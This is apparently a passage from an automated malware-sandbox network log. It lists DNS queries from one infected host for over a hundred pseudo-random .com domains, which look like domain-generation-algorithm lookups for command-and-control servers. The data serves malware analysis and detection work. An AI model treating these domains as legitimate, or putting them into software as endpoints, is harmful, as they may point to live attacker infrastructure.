                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.884919882 CET53607561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.886008024 CET53497261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.953929901 CET5138253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.965037107 CET53513821.1.1.1192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.434117079 CET192.168.2.61.1.1.10x6ee0Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.434166908 CET192.168.2.61.1.1.10xf3cStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.434708118 CET192.168.2.61.1.1.10x5c4fStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.435158968 CET192.168.2.61.1.1.10x2d41Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.313244104 CET192.168.2.61.1.1.10x807fStandard query (0)ww8.galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.328984022 CET192.168.2.61.1.1.10xa83bStandard query (0)ww3.galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.346052885 CET192.168.2.61.1.1.10xe25aStandard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.349822044 CET192.168.2.61.1.1.10xe91fStandard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.353801966 CET192.168.2.61.1.1.10xfb1Standard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.361577034 CET192.168.2.61.1.1.10x6337Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.366065025 CET192.168.2.61.1.1.10x394bStandard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.367285967 CET192.168.2.61.1.1.10xe995Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.384489059 CET192.168.2.61.1.1.10xb058Standard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.385446072 CET192.168.2.61.1.1.10x454eStandard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.387006044 CET192.168.2.61.1.1.10xa8d2Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.388262987 CET192.168.2.61.1.1.10xdd56Standard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.394844055 CET192.168.2.61.1.1.10xbddcStandard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.410953045 CET192.168.2.61.1.1.10x5da1Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.419688940 CET192.168.2.61.1.1.10xb11bStandard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.424951077 CET192.168.2.61.1.1.10x81adStandard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.427814007 CET192.168.2.61.1.1.10x1896Standard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.428821087 CET192.168.2.61.1.1.10x7973Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.444664955 CET192.168.2.61.1.1.10x248dStandard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.445023060 CET192.168.2.61.1.1.10x7cbeStandard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.450146914 CET192.168.2.61.1.1.10xbc7dStandard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.453931093 CET192.168.2.61.1.1.10x306aStandard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.455847025 CET192.168.2.61.1.1.10xebbaStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.458620071 CET192.168.2.61.1.1.10xf96Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.468007088 CET192.168.2.61.1.1.10x9781Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.468827963 CET192.168.2.61.1.1.10xe0efStandard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.543097019 CET192.168.2.61.1.1.10xcf68Standard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.549917936 CET192.168.2.61.1.1.10x62dbStandard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.563604116 CET192.168.2.61.1.1.10xbe03Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.571603060 CET192.168.2.61.1.1.10x10beStandard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.588484049 CET192.168.2.61.1.1.10xff5eStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.589489937 CET192.168.2.61.1.1.10xe185Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.589943886 CET192.168.2.61.1.1.10x5c02Standard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.590672016 CET192.168.2.61.1.1.10x6ca3Standard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.620101929 CET192.168.2.61.1.1.10xf714Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.621606112 CET192.168.2.61.1.1.10xb281Standard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.645428896 CET192.168.2.61.1.1.10x5f0aStandard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.645728111 CET192.168.2.61.1.1.10x6873Standard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.646007061 CET192.168.2.61.1.1.10xd8fbStandard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.646249056 CET192.168.2.61.1.1.10x42abStandard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.646466970 CET192.168.2.61.1.1.10xb046Standard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.646656036 CET192.168.2.61.1.1.10x17f1Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.652326107 CET192.168.2.61.1.1.10xc783Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.665158987 CET192.168.2.61.1.1.10xfb7Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.665330887 CET192.168.2.61.1.1.10x1acdStandard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.665642023 CET192.168.2.61.1.1.10x4942Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.665957928 CET192.168.2.61.1.1.10x3911Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.672481060 CET192.168.2.61.1.1.10x1652Standard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.673048019 CET192.168.2.61.1.1.10x8703Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.673651934 CET192.168.2.61.1.1.10xcc09Standard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.676316023 CET192.168.2.61.1.1.10x6ebfStandard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.676779985 CET192.168.2.61.1.1.10x81d3Standard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.685956001 CET192.168.2.61.1.1.10x74b1Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.687298059 CET192.168.2.61.1.1.10x9f1eStandard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.687725067 CET192.168.2.61.1.1.10x21c8Standard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.688175917 CET192.168.2.61.1.1.10x6cc6Standard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.688376904 CET192.168.2.61.1.1.10xee8aStandard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.688544989 CET192.168.2.61.1.1.10xedbStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.690730095 CET192.168.2.61.1.1.10xaf7fStandard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.691030025 CET192.168.2.61.1.1.10xef26Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.691454887 CET192.168.2.61.1.1.10x6c9aStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.694997072 CET192.168.2.61.1.1.10xdaddStandard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.695271969 CET192.168.2.61.1.1.10x96d2Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.695518970 CET192.168.2.61.1.1.10xab4bStandard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.712315083 CET192.168.2.61.1.1.10xa7f7Standard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.716938972 CET192.168.2.61.1.1.10xd256Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.678922892 CET192.168.2.61.1.1.10x41d1Standard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.687304020 CET192.168.2.61.1.1.10x9015Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.690649986 CET192.168.2.61.1.1.10x91adStandard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.691045046 CET192.168.2.61.1.1.10x5521Standard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.694417953 CET192.168.2.61.1.1.10x61b4Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.700654984 CET192.168.2.61.1.1.10x85bStandard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.707710028 CET192.168.2.61.1.1.10xda5dStandard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.708123922 CET192.168.2.61.1.1.10x9f6aStandard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.714607000 CET192.168.2.61.1.1.10x5e07Standard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.714782000 CET192.168.2.61.1.1.10x332dStandard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.716830015 CET192.168.2.61.1.1.10xd02aStandard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.718161106 CET192.168.2.61.1.1.10xaa05Standard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.718504906 CET192.168.2.61.1.1.10x1e72Standard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:38.719069004 CET192.168.2.61.1.1.10x2de1Standard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.994172096 CET192.168.2.61.1.1.10x7ffcStandard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.996511936 CET192.168.2.61.1.1.10x461eStandard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.996697903 CET192.168.2.61.1.1.10xcf05Standard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:40.996926069 CET192.168.2.61.1.1.10xc6bdStandard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.234852076 CET192.168.2.61.1.1.10x613dStandard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.235184908 CET192.168.2.61.1.1.10x1206Standard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.236793995 CET192.168.2.61.1.1.10x6449Standard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.238014936 CET192.168.2.61.1.1.10x676fStandard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.239157915 CET192.168.2.61.1.1.10x4ce7Standard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.244808912 CET192.168.2.61.1.1.10xdf48Standard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.248373032 CET192.168.2.61.1.1.10x1edStandard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.248509884 CET192.168.2.61.1.1.10xe7c3Standard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.250144005 CET192.168.2.61.1.1.10x2712Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.253635883 CET192.168.2.61.1.1.10xc8e8Standard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.254096985 CET192.168.2.61.1.1.10xb192Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.266858101 CET192.168.2.61.1.1.10x21bfStandard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.267354965 CET192.168.2.61.1.1.10xee57Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.267582893 CET192.168.2.61.1.1.10x1daeStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.267913103 CET192.168.2.61.1.1.10x481cStandard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.277581930 CET192.168.2.61.1.1.10x9f4dStandard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.281344891 CET192.168.2.61.1.1.10x4501Standard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.284965992 CET192.168.2.61.1.1.10x1613Standard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.285099983 CET192.168.2.61.1.1.10x59edStandard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.288749933 CET192.168.2.61.1.1.10x92ffStandard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.289174080 CET192.168.2.61.1.1.10x6c3eStandard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.289712906 CET192.168.2.61.1.1.10x878fStandard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.291265965 CET192.168.2.61.1.1.10xe646Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.291565895 CET192.168.2.61.1.1.10x42f4Standard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.295891047 CET192.168.2.61.1.1.10x5cd1Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.296145916 CET192.168.2.61.1.1.10x7d53Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.296442032 CET192.168.2.61.1.1.10x99c9Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.299664021 CET192.168.2.61.1.1.10x3361Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.299783945 CET192.168.2.61.1.1.10x362bStandard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.300323963 CET192.168.2.61.1.1.10x21b6Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.300569057 CET192.168.2.61.1.1.10xebd9Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.300992012 CET192.168.2.61.1.1.10xc371Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.301028013 CET192.168.2.61.1.1.10xa9e1Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.304755926 CET192.168.2.61.1.1.10x3612Standard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.305510998 CET192.168.2.61.1.1.10x7bc9Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.306241035 CET192.168.2.61.1.1.10xd5e6Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.310504913 CET192.168.2.61.1.1.10x441cStandard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.311197042 CET192.168.2.61.1.1.10x86abStandard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.311589956 CET192.168.2.61.1.1.10x843cStandard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.311762094 CET192.168.2.61.1.1.10xb323Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.311913967 CET192.168.2.61.1.1.10x1392Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.313069105 CET192.168.2.61.1.1.10xd480Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.317311049 CET192.168.2.61.1.1.10x614fStandard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.318208933 CET192.168.2.61.1.1.10x606fStandard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.318696976 CET192.168.2.61.1.1.10xdf7bStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.319479942 CET192.168.2.61.1.1.10xa703Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.320086956 CET192.168.2.61.1.1.10xcad6Standard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.320868015 CET192.168.2.61.1.1.10x9e04Standard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.328665018 CET192.168.2.61.1.1.10x8e4fStandard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.330409050 CET192.168.2.61.1.1.10xa488Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.331448078 CET192.168.2.61.1.1.10x9d3eStandard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.331665993 CET192.168.2.61.1.1.10x3b74Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.331839085 CET192.168.2.61.1.1.10xb220Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.332329035 CET192.168.2.61.1.1.10x83d4Standard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.332379103 CET192.168.2.61.1.1.10xa5a9Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.350027084 CET192.168.2.61.1.1.10x8022Standard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.355459929 CET192.168.2.61.1.1.10x2efcStandard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.400681973 CET192.168.2.61.1.1.10x90b7Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.400831938 CET192.168.2.61.1.1.10x698bStandard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.403724909 CET192.168.2.61.1.1.10xa5acStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.413099051 CET192.168.2.61.1.1.10x6a4dStandard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.413477898 CET192.168.2.61.1.1.10x4686Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.454965115 CET192.168.2.61.1.1.10xa528Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:41.455725908 CET192.168.2.61.1.1.10x8c96Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.727524996 CET192.168.2.61.1.1.10xb3b0Standard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.728529930 CET192.168.2.61.1.1.10x7abdStandard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.729106903 CET192.168.2.61.1.1.10xdb4cStandard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.730252981 CET192.168.2.61.1.1.10x6102Standard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.731545925 CET192.168.2.61.1.1.10xf8baStandard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.738930941 CET192.168.2.61.1.1.10x5e5bStandard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.739038944 CET192.168.2.61.1.1.10xffaeStandard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.741543055 CET192.168.2.61.1.1.10x12f9Standard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.743567944 CET192.168.2.61.1.1.10xf205Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.746927977 CET192.168.2.61.1.1.10x4957Standard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.748184919 CET192.168.2.61.1.1.10xe0e7Standard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.748862982 CET192.168.2.61.1.1.10x3f8cStandard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.748862982 CET192.168.2.61.1.1.10xe292Standard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.749516964 CET192.168.2.61.1.1.10x1c89Standard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.749660015 CET192.168.2.61.1.1.10xb2d6Standard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:42.750348091 CET192.168.2.61.1.1.10xc939Standard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.841571093 CET192.168.2.61.1.1.10x91a7Standard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.844367027 CET192.168.2.61.1.1.10xdcfStandard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.846759081 CET192.168.2.61.1.1.10x6b18Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.848562956 CET192.168.2.61.1.1.10x8befStandard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.853858948 CET192.168.2.61.1.1.10x5176Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.854793072 CET192.168.2.61.1.1.10x36f2Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.855395079 CET192.168.2.61.1.1.10x58c7Standard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.855395079 CET192.168.2.61.1.1.10xea2fStandard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.855799913 CET192.168.2.61.1.1.10xb26cStandard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:43.856405973 CET192.168.2.61.1.1.10x84efStandard query (0)lyvylod.comA (IP address)IN (0x0001)false
